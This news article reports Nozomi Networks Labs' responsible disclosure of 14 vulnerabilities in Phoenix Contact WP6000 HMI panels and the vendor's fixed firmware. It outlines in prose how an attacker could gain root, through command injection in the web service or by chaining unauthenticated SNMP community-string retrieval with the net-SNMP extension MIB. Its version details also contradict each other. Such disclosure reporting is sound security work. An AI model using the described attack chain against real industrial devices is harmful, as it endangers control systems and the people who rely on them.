Nozomi reveals 14 critical vulnerabilities in Phoenix Contact HMI, enabling exploitation by remote hackers

Researchers from Nozomi Networks Labs disclosed Tuesday the presence of 14 vulnerabilities in the Phoenix Contact Web Panel 6121-WXPS HMI device (firmware version 3.1.7). The team found that the device is affected by several critical issues that could be exploited by a remote attacker to completely compromise it. The most critical vulnerabilities affect the two main network services (i.e., HTTPS web server and the SNMP protocol), which are exposed by default on the WP 6121-WXPS to execute maintenance operations on the target device. 

The German equipment manufacturer Phoenix Contact offers industrial automation and control systems, including PLCs, industrial PCs, and HMI (human-machine interface) panels. The company’s WP 6121-WXPS device is part of the WP6000 line, an internet-accessible HMI touch panel for monitoring automation solutions and control systems.

In the first part of a three-part series, Nozomi provided an overview of the vulnerabilities they found and their most critical consequences on an ICS (industrial control systems) infrastructure that uses a vulnerable WP6000 HMI. The team at Nozomi Networks Lab wrote in a blog post that “During our research, we identified that the Phoenix Contact WP 6121-WXPS is affected by several critical issues that could be exploited by a remote attacker to completely compromise the device and, consequently, the connected industrial control system.”

In April, Nozomi responsibly disclosed all findings to Phoenix Contact’s Product Security Incident Response Team (PSIRT). Upon receiving the research findings and documentation, the vendor immediately reviewed Nozomi’s advisories and began working on a remediation plan to address the issues. On reviewing the vulnerabilities, the Phoenix Contact confirmed that vulnerabilities affect WP 6070-WVPS, WP 6101-WXPS, WP 6121-WXPS, WP 6156-WHPS, WP 6185-WHPS, and WP 6215-WHPS versions, affecting versions 4.0.10 and below.

The 14 vulnerabilities discovered and disclosed by the Nozomi Networks Labs team can be categorized across four categories – critical, high, medium, and low. Critical vulnerabilities include CVE-2023-3570, CVE-2023-3571, CVE-2023-3572, and CVE-2023-3573, all resulting from improper neutralization of special elements in OS commands. These vulnerabilities are identified as OS Command Injection and have a CVSS base score of 9.9. 

High vulnerabilities include CVE-2023-37860, CVE-2023-37861, and CVE-2023-37862, with CVSS base scores of 8.6, 8.8, and 8.2, respectively, affecting missing authorization, OS command injection, and missing authorization. Other high vulnerabilities include CVE-2023-37863 with a CVSS base score of 7.2 covers improper neutralization of special elements used in an OS command; CVE-2023-37864 with a CVSS base score of 7.2 covers the download of code without integrity check; and CVE-2023-37859 with a CVSS base score of 7.2 that covers improper privilege management. 

Nozomi Networks Labs discovered medium vulnerabilities CVE-2023-37855 and CVE-2023-37856, covering externally controlled reference to resources in another sphere. Both had CVSS base scores of 4.3. Low vulnerabilities CVE-2023-37857 and CVE-2023-37858 enable the use of hard-coded credentials, with 3.8 CVSS base scores. 

“The most critical consequences of the vulnerabilities listed above affect the two main network services (i.e., HTTPS web server and the SNMP protocol) which are exposed by default on the WP 6121-WXPS ethernet interface. These services are necessary to execute maintenance operations on the target device such as firmware update through the SNMP protocol,” according to the researchers. “Even though the exact threat model depends on the final infrastructure of the network where the Phoenix Contact HMI will be placed (i.e., every client can structure it based on its needs), we can assume that the WP 6121-WXPS ethernet interface will be reachable from a local or remote network point so that IT operators can perform daily monitoring tasks from their control center workstation.”

The team added that if the Phoenix Contact HMI is not properly protected (e.g., the firewall in Zone 2 is misconfigured) so that an attacker positioned in the network can view the vulnerable services exposed by the HMI, then it would be possible to exploit the security vulnerabilities described here to gain administrative access on the Phoenix Contact WP 6121-WXPS HMI. 

“To compromise the target device through HTTPS, an attacker can exploit one of the critical issues we reported before (i.e., CVE-2023-3570, CVE-2023-3571, CVE-2023-3572 or CVE-2023-3573),” Nozomi researchers highlighted. “Due to a software defect in the HTTPS web service, it’s possible to force the vulnerable component to run arbitrary commands on the underlying system. Because this application is executed with root privileges, all these actions are executed with administrative rights.”

To compromise the target device through SNMP, it is necessary to exploit and chain three vulnerabilities. These are the CVE-2023-37860 by leveraging a non-authenticated API exposed by the HTTPS web service, it’s possible to retrieve both ‘read’ and ‘write’ community strings that are used by the SNMPv2 protocol as an authentication mechanism. The CVE-2023-37859 identified that the SNMP service (i.e., net-SNMP) is executed with root privileges and that the ‘NET-SNMP-EXTENDED-MIB’ extension MIB is loaded. 

The team added that “As other researchers have previously identified, this extension could be abused to execute arbitrary shell scripts through the SNMP agent. Due to this condition, after exploiting the CVE-2023-37860 vulnerability and retrieving the write community string without authentication, an attacker can get an administrative shell on the vulnerable device.”

The CVE-2023-37863 vulnerability is part of our novel findings discovered after reverse engineering the shared library that implements the firmware update process through proprietary MIBs (specifications are in the PXC-WP6K-MIB[dot]mib file attached inside the firmware image). Specifically, Nozomi researchers discovered that this functionality is subject to an ‘OS Command Injection’ vulnerability that could be abused to execute arbitrary commands on the system.

In response to the issues Nozomi found, Phoenix Contact produced a new firmware release (v4.0.10) that addresses the reported vulnerabilities and asserted that these issues affect not only the 6121-WXPS device but the whole WP6000 product family.

Last month, the Nozomi researchers disclosed three vulnerabilities (critical, high, and medium risk) that affect the BlueMark DroneScout ds230 device. Two vulnerabilities could enable an attacker to spoof Remote ID information, causing DroneScout ds230 to drop Remote ID information from legitimate drones, allowing the attacker to inject fake locations. The third vulnerability discovered demonstrates the capability to install malicious firmware updates on the DroneScout appliance.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.